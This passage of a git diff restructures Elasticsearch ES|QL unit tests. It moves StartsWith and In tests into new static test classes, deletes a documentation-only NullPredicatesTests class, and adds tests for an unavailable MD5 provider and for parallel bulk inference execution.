"field", "*a\\*b\\?c\\\\"))); - } } diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/HashStaticTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/HashStaticTests.java index 871bec7c06804..61577ee56777e 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/HashStaticTests.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/HashStaticTests.java @@ -13,22 +13,30 @@ import org.elasticsearch.common.util.BigArrays; import org.elasticsearch.common.util.MockBigArrays; import org.elasticsearch.common.util.PageCacheRecycler; +import org.elasticsearch.common.util.Result; import org.elasticsearch.compute.data.BlockFactory; import org.elasticsearch.compute.operator.DriverContext; import org.elasticsearch.test.ESTestCase; +import org.elasticsearch.test.hamcrest.OptionalMatchers; import org.elasticsearch.xpack.esql.core.InvalidArgumentException; import org.elasticsearch.xpack.esql.core.expression.Literal; import org.elasticsearch.xpack.esql.core.tree.Source; import org.elasticsearch.xpack.esql.core.type.DataType; import org.junit.After; +import java.security.NoSuchAlgorithmException; +import java.security.Provider; +import java.security.Security; import java.util.ArrayList; import java.util.Collections; import java.util.List; +import static org.elasticsearch.test.TestMatchers.throwableWithMessage; import static org.elasticsearch.xpack.esql.expression.function.AbstractFunctionTestCase.evaluator; import static org.elasticsearch.xpack.esql.expression.function.AbstractFunctionTestCase.field; +import static org.hamcrest.Matchers.containsString; import static org.hamcrest.Matchers.equalTo; +import static org.hamcrest.Matchers.is; import static org.hamcrest.Matchers.startsWith; public class HashStaticTests extends ESTestCase { @@ -45,6 +53,27 @@ public void testInvalidAlgorithmLiteral() { assertThat(e.getMessage(), startsWith("invalid algorithm for [hast(\"invalid\", input)]: invalid MessageDigest not available")); } + public void testTryCreateUnavailableMd5() throws NoSuchAlgorithmException { + assumeFalse("We run with different security providers in FIPS, and changing them at runtime is more complicated", inFipsJvm()); + final Provider sunProvider = Security.getProvider("SUN"); + try { + Security.removeProvider("SUN"); + final Result result = Hash.HashFunction.tryCreate("MD5"); + assertThat(result.isSuccessful(), is(false)); + assertThat(result.failure(), OptionalMatchers.isPresentWith(throwableWithMessage(containsString("MD5")))); + expectThrows(NoSuchAlgorithmException.class, result::get); + } finally { + Security.addProvider(sunProvider); + } + + { + final Result result = Hash.HashFunction.tryCreate("MD5"); + assertThat(result.isSuccessful(), is(true)); + assertThat(result.failure(), OptionalMatchers.isEmpty()); + assertThat(result.get().algorithm(), is("MD5")); + } + } + /** * The following fields and methods were borrowed from AbstractScalarFunctionTestCase */ diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/StartsWithStaticTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/StartsWithStaticTests.java new file mode 100644 index 0000000000000..105ce6a9e4142 --- /dev/null +++ 
b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/StartsWithStaticTests.java @@ -0,0 +1,56 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +package org.elasticsearch.xpack.esql.expression.function.scalar.string; + +import org.elasticsearch.test.ESTestCase; +import org.elasticsearch.xpack.esql.capabilities.TranslationAware; +import org.elasticsearch.xpack.esql.core.expression.FieldAttribute; +import org.elasticsearch.xpack.esql.core.expression.Literal; +import org.elasticsearch.xpack.esql.core.querydsl.query.WildcardQuery; +import org.elasticsearch.xpack.esql.core.tree.Source; +import org.elasticsearch.xpack.esql.core.type.DataType; +import org.elasticsearch.xpack.esql.core.type.EsField; +import org.elasticsearch.xpack.esql.optimizer.rules.physical.local.LucenePushdownPredicates; +import org.elasticsearch.xpack.esql.planner.TranslatorHandler; + +import java.util.Map; + +import static org.hamcrest.Matchers.equalTo; + +public class StartsWithStaticTests extends ESTestCase { + + public void testLuceneQuery_AllLiterals_NonTranslatable() { + var function = new StartsWith(Source.EMPTY, Literal.keyword(Source.EMPTY, "test"), Literal.keyword(Source.EMPTY, "test")); + + assertThat(function.translatable(LucenePushdownPredicates.DEFAULT), equalTo(TranslationAware.Translatable.NO)); + } + + public void testLuceneQuery_NonFoldablePrefix_NonTranslatable() { + var function = new StartsWith( + Source.EMPTY, + new FieldAttribute(Source.EMPTY, "field", new EsField("field", DataType.KEYWORD, Map.of(), true)), + new FieldAttribute(Source.EMPTY, "field", new EsField("prefix", DataType.KEYWORD, Map.of(), true)) + ); + + assertThat(function.translatable(LucenePushdownPredicates.DEFAULT), equalTo(TranslationAware.Translatable.NO)); + } + + public void testLuceneQuery_NonFoldablePrefix_Translatable() { + var function = new StartsWith( + Source.EMPTY, + new FieldAttribute(Source.EMPTY, "field", new EsField("prefix", DataType.KEYWORD, Map.of(), true)), + Literal.keyword(Source.EMPTY, "a*b?c\\") + ); + + assertThat(function.translatable(LucenePushdownPredicates.DEFAULT), equalTo(TranslationAware.Translatable.YES)); + + var query = function.asQuery(LucenePushdownPredicates.DEFAULT, TranslatorHandler.TRANSLATOR_HANDLER); + + assertThat(query, equalTo(new WildcardQuery(Source.EMPTY, "field", "a\\*b\\?c\\\\*", false, false))); + } +} diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/StartsWithTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/StartsWithTests.java index c716457dd8378..e1d02472fca43 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/StartsWithTests.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/StartsWithTests.java @@ -11,22 +11,14 @@ import com.carrotsearch.randomizedtesting.annotations.ParametersFactory; import org.apache.lucene.util.BytesRef; -import org.elasticsearch.xpack.esql.capabilities.TranslationAware; import org.elasticsearch.xpack.esql.core.expression.Expression; -import org.elasticsearch.xpack.esql.core.expression.FieldAttribute; -import org.elasticsearch.xpack.esql.core.expression.Literal; -import 
org.elasticsearch.xpack.esql.core.querydsl.query.WildcardQuery; import org.elasticsearch.xpack.esql.core.tree.Source; import org.elasticsearch.xpack.esql.core.type.DataType; -import org.elasticsearch.xpack.esql.core.type.EsField; import org.elasticsearch.xpack.esql.expression.function.AbstractScalarFunctionTestCase; import org.elasticsearch.xpack.esql.expression.function.TestCaseSupplier; -import org.elasticsearch.xpack.esql.optimizer.rules.physical.local.LucenePushdownPredicates; -import org.elasticsearch.xpack.esql.planner.TranslatorHandler; import java.util.ArrayList; import java.util.List; -import java.util.Map; import java.util.function.Supplier; import static org.hamcrest.Matchers.equalTo; @@ -67,33 +59,4 @@ protected Expression build(Source source, List args) { return new StartsWith(source, args.get(0), args.get(1)); } - public void testLuceneQuery_AllLiterals_NonTranslatable() { - var function = new StartsWith(Source.EMPTY, Literal.keyword(Source.EMPTY, "test"), Literal.keyword(Source.EMPTY, "test")); - - assertThat(function.translatable(LucenePushdownPredicates.DEFAULT), equalTo(TranslationAware.Translatable.NO)); - } - - public void testLuceneQuery_NonFoldablePrefix_NonTranslatable() { - var function = new StartsWith( - Source.EMPTY, - new FieldAttribute(Source.EMPTY, "field", new EsField("field", DataType.KEYWORD, Map.of(), true)), - new FieldAttribute(Source.EMPTY, "field", new EsField("prefix", DataType.KEYWORD, Map.of(), true)) - ); - - assertThat(function.translatable(LucenePushdownPredicates.DEFAULT), equalTo(TranslationAware.Translatable.NO)); - } - - public void testLuceneQuery_NonFoldablePrefix_Translatable() { - var function = new StartsWith( - Source.EMPTY, - new FieldAttribute(Source.EMPTY, "field", new EsField("prefix", DataType.KEYWORD, Map.of(), true)), - Literal.keyword(Source.EMPTY, "a*b?c\\") - ); - - assertThat(function.translatable(LucenePushdownPredicates.DEFAULT), equalTo(TranslationAware.Translatable.YES)); - - var query = function.asQuery(LucenePushdownPredicates.DEFAULT, TranslatorHandler.TRANSLATOR_HANDLER); - - assertThat(query, equalTo(new WildcardQuery(Source.EMPTY, "field", "a\\*b\\?c\\\\*"))); - } } diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/WildcardLikeListTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/WildcardLikeListTests.java index cac1692f1a86e..78e4c951829d5 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/WildcardLikeListTests.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/WildcardLikeListTests.java @@ -11,6 +11,8 @@ import com.carrotsearch.randomizedtesting.annotations.ParametersFactory; import org.apache.lucene.util.BytesRef; +import org.elasticsearch.xpack.esql.EsqlTestUtils; +import org.elasticsearch.xpack.esql.capabilities.TranslationAware; import org.elasticsearch.xpack.esql.core.expression.Expression; import org.elasticsearch.xpack.esql.core.expression.FoldContext; import org.elasticsearch.xpack.esql.core.expression.Literal; @@ -22,12 +24,15 @@ import org.elasticsearch.xpack.esql.expression.function.FunctionName; import org.elasticsearch.xpack.esql.expression.function.TestCaseSupplier; import org.elasticsearch.xpack.esql.expression.function.scalar.string.regex.WildcardLikeList; +import org.elasticsearch.xpack.esql.optimizer.rules.physical.local.LucenePushdownPredicates; +import 
org.elasticsearch.xpack.esql.plugin.EsqlFlags; import java.util.ArrayList; import java.util.List; import java.util.function.Function; import java.util.function.Supplier; +import static org.elasticsearch.TransportVersions.V_8_17_0; import static org.hamcrest.Matchers.equalTo; import static org.hamcrest.Matchers.startsWith; @@ -96,4 +101,20 @@ static Expression buildWildcardLikeList(Source source, List args) { ? new WildcardLikeList(source, expression, wildcardPatternList) : new WildcardLikeList(source, expression, wildcardPatternList, false)); } + + public void testNotPushableOverCanMatch() { + TranslationAware translatable = (TranslationAware) buildFieldExpression(testCase); + assertThat( + translatable.translatable(LucenePushdownPredicates.forCanMatch(V_8_17_0, new EsqlFlags(true))).finish(), + equalTo(TranslationAware.FinishedTranslatable.NO) + ); + } + + public void testPushable() { + TranslationAware translatable = (TranslationAware) buildFieldExpression(testCase); + assertThat( + translatable.translatable(LucenePushdownPredicates.from(new EsqlTestUtils.TestSearchStats(), new EsqlFlags(true))).finish(), + equalTo(TranslationAware.FinishedTranslatable.YES) + ); + } } diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/WildcardLikeTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/WildcardLikeTests.java index a9e9e5f917785..858d7235b2c70 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/WildcardLikeTests.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/function/scalar/string/WildcardLikeTests.java @@ -83,7 +83,7 @@ protected Expression build(Source source, List args) { return buildWildcardLike(source, args); } - static Expression buildWildcardLike(Source source, List args) { + Expression buildWildcardLike(Source source, List args) { Expression expression = args.get(0); Literal pattern = (Literal) args.get(1); Literal caseInsensitive = args.size() > 2 ? (Literal) args.get(2) : null; diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/predicate/operator/NullPredicatesTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/predicate/operator/NullPredicatesTests.java deleted file mode 100644 index 69bfcc99a21ea..0000000000000 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/predicate/operator/NullPredicatesTests.java +++ /dev/null @@ -1,181 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. 
- */ - -package org.elasticsearch.xpack.esql.expression.predicate.operator; - -import org.elasticsearch.test.ESTestCase; -import org.elasticsearch.xpack.esql.core.expression.Expression; -import org.elasticsearch.xpack.esql.core.type.DataType; -import org.elasticsearch.xpack.esql.expression.function.AbstractFunctionTestCase; -import org.elasticsearch.xpack.esql.expression.function.DocsV3Support; -import org.elasticsearch.xpack.esql.expression.function.Example; -import org.elasticsearch.xpack.esql.expression.function.FunctionInfo; -import org.elasticsearch.xpack.esql.expression.function.Param; -import org.elasticsearch.xpack.esql.expression.function.scalar.convert.ToStringTests; -import org.junit.AfterClass; - -import java.util.LinkedHashMap; -import java.util.List; -import java.util.Map; - -/** - * In the documentation we document `IS NULL` and `IS NOT NULL` together. - */ -public class NullPredicatesTests extends ESTestCase { - public void testDummy() { - assert true; - } - - @AfterClass - public static void renderDocs() throws Exception { - if (System.getProperty("generateDocs") == null) { - return; - } - renderNullPredicate( - new DocsV3Support.OperatorConfig( - "predicates", - "IS NULL and IS NOT NULL", - TestNullPredicates.class, - DocsV3Support.OperatorCategory.UNARY - ) - ); - renderNullPredicate( - new DocsV3Support.OperatorConfig( - "is_null", - "IS NULL", - TestIsNullPredicate.class, - DocsV3Support.OperatorCategory.NULL_PREDICATES - ) - ); - renderNullPredicate( - new DocsV3Support.OperatorConfig( - "is_not_null", - "IS NOT NULL", - TestIsNotNullPredicate.class, - DocsV3Support.OperatorCategory.NULL_PREDICATES - ) - ); - } - - private static void renderNullPredicate(DocsV3Support.OperatorConfig op) throws Exception { - var docs = new DocsV3Support.OperatorsDocsSupport(op.name(), NullPredicatesTests.class, op, NullPredicatesTests::signatures); - docs.renderSignature(); - docs.renderDocs(); - } - - public static Map, DataType> signatures() { - // TODO: Verify the correct datatypes for this - Map, DataType> toString = AbstractFunctionTestCase.signatures(ToStringTests.class); - Map, DataType> results = new LinkedHashMap<>(); - for (var entry : toString.entrySet()) { - DataType dataType = entry.getKey().getFirst(); - results.put(List.of(dataType), DataType.BOOLEAN); - } - return results; - } - - /** - * This class only exists to provide FunctionInfo for the documentation - */ - public class TestNullPredicates { - @FunctionInfo( - returnType = {}, - description = "For NULL comparison use the `IS NULL` and `IS NOT NULL` predicates.", - examples = { @Example(file = "null", tag = "is-null"), @Example(file = "null", tag = "is-not-null") } - ) - public TestNullPredicates( - @Param( - name = "field", - type = { - "boolean", - "cartesian_point", - "cartesian_shape", - "date", - "date_nanos", - "double", - "geo_point", - "geo_shape", - "integer", - "ip", - "keyword", - "long", - "text", - "unsigned_long", - "version" }, - description = "Input value. The input can be a single- or multi-valued column or an expression." 
- ) Expression v - ) {} - } - - /** - * This class only exists to provide FunctionInfo for the documentation - */ - public class TestIsNullPredicate { - @FunctionInfo( - operator = "IS NULL", - returnType = {}, - description = "Use `IS NULL` to filter data based on whether the field exists or not.", - examples = { @Example(file = "null", tag = "is-null") } - ) - public TestIsNullPredicate( - @Param( - name = "field", - type = { - "boolean", - "cartesian_point", - "cartesian_shape", - "date", - "date_nanos", - "double", - "geo_point", - "geo_shape", - "integer", - "ip", - "keyword", - "long", - "text", - "unsigned_long", - "version" }, - description = "Input value. The input can be a single- or multi-valued column or an expression." - ) Expression v - ) {} - } - - /** - * This class only exists to provide FunctionInfo for the documentation - */ - public class TestIsNotNullPredicate { - @FunctionInfo( - operator = "IS NOT NULL", - returnType = {}, - description = "Use `IS NOT NULL` to filter data based on whether the field exists or not.", - examples = { @Example(file = "null", tag = "is-not-null") } - ) - public TestIsNotNullPredicate( - @Param( - name = "field", - type = { - "boolean", - "cartesian_point", - "cartesian_shape", - "date", - "date_nanos", - "double", - "geo_point", - "geo_shape", - "integer", - "ip", - "keyword", - "long", - "text", - "unsigned_long", - "version" }, - description = "Input value. The input can be a single- or multi-valued column or an expression." - ) Expression v - ) {} - } -} diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InStaticTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InStaticTests.java new file mode 100644 index 0000000000000..b2fa9f4221769 --- /dev/null +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InStaticTests.java @@ -0,0 +1,69 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. 
+ */ + +package org.elasticsearch.xpack.esql.expression.predicate.operator.comparison; + +import org.elasticsearch.test.ESTestCase; +import org.elasticsearch.xpack.esql.core.expression.FieldAttribute; +import org.elasticsearch.xpack.esql.core.expression.FoldContext; +import org.elasticsearch.xpack.esql.core.expression.Literal; +import org.elasticsearch.xpack.esql.core.querydsl.query.TermsQuery; +import org.elasticsearch.xpack.esql.core.tree.Source; +import org.elasticsearch.xpack.esql.core.type.DataType; +import org.elasticsearch.xpack.esql.core.type.EsField; +import org.elasticsearch.xpack.esql.optimizer.rules.physical.local.LucenePushdownPredicates; +import org.elasticsearch.xpack.esql.planner.TranslatorHandler; + +import java.util.Arrays; +import java.util.Map; +import java.util.Set; + +import static org.elasticsearch.xpack.esql.EsqlTestUtils.L; +import static org.elasticsearch.xpack.esql.core.expression.Literal.NULL; +import static org.elasticsearch.xpack.esql.core.tree.Source.EMPTY; + +public class InStaticTests extends ESTestCase { + private static final Literal ONE = L(1); + private static final Literal TWO = L(2); + private static final Literal THREE = L(3); + + public void testInWithContainedValue() { + In in = new In(EMPTY, TWO, Arrays.asList(ONE, TWO, THREE)); + assertTrue((Boolean) in.fold(FoldContext.small())); + } + + public void testInWithNotContainedValue() { + In in = new In(EMPTY, THREE, Arrays.asList(ONE, TWO)); + assertFalse((Boolean) in.fold(FoldContext.small())); + } + + public void testHandleNullOnLeftValue() { + In in = new In(EMPTY, NULL, Arrays.asList(ONE, TWO, THREE)); + assertNull(in.fold(FoldContext.small())); + in = new In(EMPTY, NULL, Arrays.asList(ONE, NULL, THREE)); + assertNull(in.fold(FoldContext.small())); + + } + + public void testHandleNullsOnRightValue() { + In in = new In(EMPTY, THREE, Arrays.asList(ONE, NULL, THREE)); + assertTrue((Boolean) in.fold(FoldContext.small())); + in = new In(EMPTY, ONE, Arrays.asList(TWO, NULL, THREE)); + assertNull(in.fold(FoldContext.small())); + } + + public void testConvertedNull() { + In in = new In( + EMPTY, + new FieldAttribute(Source.EMPTY, "field", new EsField("suffix", DataType.KEYWORD, Map.of(), true)), + Arrays.asList(ONE, new Literal(Source.EMPTY, null, randomFrom(DataType.types())), THREE) + ); + var query = in.asQuery(LucenePushdownPredicates.DEFAULT, TranslatorHandler.TRANSLATOR_HANDLER); + assertEquals(new TermsQuery(EMPTY, "field", Set.of(1, 3)), query); + } + +} diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InTests.java index 449389accc37b..f56dcb220b6ca 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InTests.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/expression/predicate/operator/comparison/InTests.java @@ -13,32 +13,19 @@ import org.elasticsearch.geo.GeometryTestUtils; import org.elasticsearch.geo.ShapeTestUtils; import org.elasticsearch.xpack.esql.core.expression.Expression; -import org.elasticsearch.xpack.esql.core.expression.FieldAttribute; -import org.elasticsearch.xpack.esql.core.expression.FoldContext; -import org.elasticsearch.xpack.esql.core.expression.Literal; -import org.elasticsearch.xpack.esql.core.querydsl.query.TermsQuery; import org.elasticsearch.xpack.esql.core.tree.Source; import 
org.elasticsearch.xpack.esql.core.type.DataType; -import org.elasticsearch.xpack.esql.core.type.EsField; import org.elasticsearch.xpack.esql.expression.function.AbstractFunctionTestCase; import org.elasticsearch.xpack.esql.expression.function.TestCaseSupplier; -import org.elasticsearch.xpack.esql.optimizer.rules.physical.local.LucenePushdownPredicates; -import org.elasticsearch.xpack.esql.planner.TranslatorHandler; import org.junit.AfterClass; import java.util.ArrayList; -import java.util.Arrays; import java.util.List; import java.util.Locale; -import java.util.Map; -import java.util.Set; import java.util.function.Supplier; import java.util.stream.IntStream; -import static org.elasticsearch.xpack.esql.EsqlTestUtils.of; import static org.elasticsearch.xpack.esql.EsqlTestUtils.randomLiteral; -import static org.elasticsearch.xpack.esql.core.expression.Literal.NULL; -import static org.elasticsearch.xpack.esql.core.tree.Source.EMPTY; import static org.elasticsearch.xpack.esql.core.type.DataType.CARTESIAN_POINT; import static org.elasticsearch.xpack.esql.core.type.DataType.CARTESIAN_SHAPE; import static org.elasticsearch.xpack.esql.core.type.DataType.GEO_POINT; @@ -54,49 +41,6 @@ public InTests(@Name("TestCase") Supplier testCaseSup this.testCase = testCaseSupplier.get(); } - private static final Literal ONE = L(1); - private static final Literal TWO = L(2); - private static final Literal THREE = L(3); - - public void testInWithContainedValue() { - In in = new In(EMPTY, TWO, Arrays.asList(ONE, TWO, THREE)); - assertTrue((Boolean) in.fold(FoldContext.small())); - } - - public void testInWithNotContainedValue() { - In in = new In(EMPTY, THREE, Arrays.asList(ONE, TWO)); - assertFalse((Boolean) in.fold(FoldContext.small())); - } - - public void testHandleNullOnLeftValue() { - In in = new In(EMPTY, NULL, Arrays.asList(ONE, TWO, THREE)); - assertNull(in.fold(FoldContext.small())); - in = new In(EMPTY, NULL, Arrays.asList(ONE, NULL, THREE)); - assertNull(in.fold(FoldContext.small())); - - } - - public void testHandleNullsOnRightValue() { - In in = new In(EMPTY, THREE, Arrays.asList(ONE, NULL, THREE)); - assertTrue((Boolean) in.fold(FoldContext.small())); - in = new In(EMPTY, ONE, Arrays.asList(TWO, NULL, THREE)); - assertNull(in.fold(FoldContext.small())); - } - - private static Literal L(Object value) { - return of(EMPTY, value); - } - - public void testConvertedNull() { - In in = new In( - EMPTY, - new FieldAttribute(Source.EMPTY, "field", new EsField("suffix", DataType.KEYWORD, Map.of(), true)), - Arrays.asList(ONE, new Literal(Source.EMPTY, null, randomFrom(DataType.types())), THREE) - ); - var query = in.asQuery(LucenePushdownPredicates.DEFAULT, TranslatorHandler.TRANSLATOR_HANDLER); - assertEquals(new TermsQuery(EMPTY, "field", Set.of(1, 3)), query); - } - @ParametersFactory public static Iterable parameters() { List suppliers = new ArrayList<>(); diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/inference/InferenceOperatorTestCase.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/inference/InferenceOperatorTestCase.java index c49e301968aa0..25c8ffb7c34ee 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/inference/InferenceOperatorTestCase.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/inference/InferenceOperatorTestCase.java @@ -204,6 +204,11 @@ public Block eval(Page page) { return BlockUtils.deepCopyOf(page.getBlock(channel), blockFactory()); } + @Override + public long baseRamBytesUsed() { + return 
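            /* Presumably fine to report zero here: this test evaluator only
               deep-copies an existing block, so it holds no base RAM of its own. */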
0; + } + @Override public void close() { diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/inference/bulk/BulkInferenceExecutorTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/inference/bulk/BulkInferenceExecutorTests.java index 7e44c681c6fc4..03d07adbd87cd 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/inference/bulk/BulkInferenceExecutorTests.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/inference/bulk/BulkInferenceExecutorTests.java @@ -26,6 +26,8 @@ import java.util.ArrayList; import java.util.Iterator; import java.util.List; +import java.util.concurrent.CountDownLatch; +import java.util.concurrent.TimeUnit; import java.util.concurrent.atomic.AtomicReference; import static org.hamcrest.Matchers.allOf; @@ -61,7 +63,7 @@ public void shutdownThreadPool() { } public void testSuccessfulExecution() throws Exception { - List requests = randomInferenceRequestList(between(1, 1000)); + List requests = randomInferenceRequestList(between(1, 1_000)); List responses = randomInferenceResponseList(requests.size()); InferenceRunner inferenceRunner = mockInferenceRunner(invocation -> { @@ -141,6 +143,35 @@ public void testInferenceRunnerSometimesFails() throws Exception { }); } + public void testParallelBulkExecution() throws Exception { + int batches = between(50, 100); + CountDownLatch latch = new CountDownLatch(batches); + + for (int i = 0; i < batches; i++) { + runWithRandomDelay(() -> { + List requests = randomInferenceRequestList(between(1, 1_000)); + List responses = randomInferenceResponseList(requests.size()); + + InferenceRunner inferenceRunner = mockInferenceRunner(invocation -> { + runWithRandomDelay(() -> { + ActionListener l = invocation.getArgument(1); + l.onResponse(responses.get(requests.indexOf(invocation.getArgument(0, InferenceAction.Request.class)))); + }); + return null; + }); + + ActionListener> listener = ActionListener.wrap(r -> { + assertThat(r, equalTo(responses)); + latch.countDown(); + }, ESTestCase::fail); + + bulkExecutor(inferenceRunner).execute(requestIterator(requests), listener); + }); + } + + latch.await(10, TimeUnit.SECONDS); + } + private BulkInferenceExecutor bulkExecutor(InferenceRunner inferenceRunner) { return new BulkInferenceExecutor(inferenceRunner, threadPool, randomBulkExecutionConfig()); } @@ -195,11 +226,7 @@ private void runWithRandomDelay(Runnable runnable) { if (randomBoolean()) { runnable.run(); } else { - threadPool.schedule( - runnable, - TimeValue.timeValueNanos(between(1, 1_000)), - threadPool.executor(EsqlPlugin.ESQL_WORKER_THREAD_POOL_NAME) - ); + threadPool.schedule(runnable, TimeValue.timeValueNanos(between(1, 1_000)), threadPool.generic()); } } } diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/optimizer/AbstractLogicalPlanOptimizerTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/optimizer/AbstractLogicalPlanOptimizerTests.java index bff9843a89e1f..4263b8d07c8f2 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/optimizer/AbstractLogicalPlanOptimizerTests.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/optimizer/AbstractLogicalPlanOptimizerTests.java @@ -180,7 +180,7 @@ protected LogicalPlan plan(String query) { } protected LogicalPlan plan(String query, LogicalPlanOptimizer optimizer) { - var analyzed = analyzer.analyze(parser.createStatement(query)); + var analyzed = analyzer.analyze(parser.createStatement(query, 
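                /* createStatement now takes a configuration argument; the shared
                   EsqlTestUtils.TEST_CFG is threaded through every parser call
                   in these optimizer tests. */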
EsqlTestUtils.TEST_CFG)); // System.out.println(analyzed); var optimized = optimizer.optimize(analyzed); // System.out.println(optimized); @@ -188,7 +188,7 @@ protected LogicalPlan plan(String query, LogicalPlanOptimizer optimizer) { } protected LogicalPlan planAirports(String query) { - var analyzed = analyzerAirports.analyze(parser.createStatement(query)); + var analyzed = analyzerAirports.analyze(parser.createStatement(query, EsqlTestUtils.TEST_CFG)); // System.out.println(analyzed); var optimized = logicalOptimizer.optimize(analyzed); // System.out.println(optimized); @@ -196,7 +196,7 @@ protected LogicalPlan planAirports(String query) { } protected LogicalPlan planExtra(String query) { - var analyzed = analyzerExtra.analyze(parser.createStatement(query)); + var analyzed = analyzerExtra.analyze(parser.createStatement(query, EsqlTestUtils.TEST_CFG)); // System.out.println(analyzed); var optimized = logicalOptimizer.optimize(analyzed); // System.out.println(optimized); @@ -204,11 +204,11 @@ protected LogicalPlan planExtra(String query) { } protected LogicalPlan planTypes(String query) { - return logicalOptimizer.optimize(analyzerTypes.analyze(parser.createStatement(query))); + return logicalOptimizer.optimize(analyzerTypes.analyze(parser.createStatement(query, EsqlTestUtils.TEST_CFG))); } protected LogicalPlan planMultiIndex(String query) { - return logicalOptimizer.optimize(multiIndexAnalyzer.analyze(parser.createStatement(query))); + return logicalOptimizer.optimize(multiIndexAnalyzer.analyze(parser.createStatement(query, EsqlTestUtils.TEST_CFG))); } @Override diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/optimizer/LocalLogicalPlanOptimizerTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/optimizer/LocalLogicalPlanOptimizerTests.java index f2b70c99253b8..0009b6ac897dc 100644 --- a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/optimizer/LocalLogicalPlanOptimizerTests.java +++ b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/optimizer/LocalLogicalPlanOptimizerTests.java @@ -508,7 +508,7 @@ public void testSparseDocument() throws Exception { TEST_VERIFIER ); - var analyzed = analyzer.analyze(parser.createStatement(query)); + var analyzed = analyzer.analyze(parser.createStatement(query, EsqlTestUtils.TEST_CFG)); var optimized = logicalOptimizer.optimize(analyzed); var localContext = new LocalLogicalOptimizerContext(EsqlTestUtils.TEST_CFG, FoldContext.small(), searchStats); var plan = new LocalLogicalPlanOptimizer(localContext).localOptimize(optimized); @@ -785,7 +785,7 @@ private LocalRelation asEmptyRelation(Object o) { } private LogicalPlan plan(String query, Analyzer analyzer) { - var analyzed = analyzer.analyze(parser.createStatement(query)); + var analyzed = analyzer.analyze(parser.createStatement(query, EsqlTestUtils.TEST_CFG)); // System.out.println(analyzed); var optimized = logicalOptimizer.optimize(analyzed); // System.out.println(optimized); diff --git a/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/optimizer/LogicalPlanOptimizerTests.java b/x-pack/plugin/esql/src/test/java/org/elasticsearch/xpack/esql/optimizer/LogicalPlanOptimizerTests.java index 7795bf5c2d9ff..2cd28b817a184 100644 --- 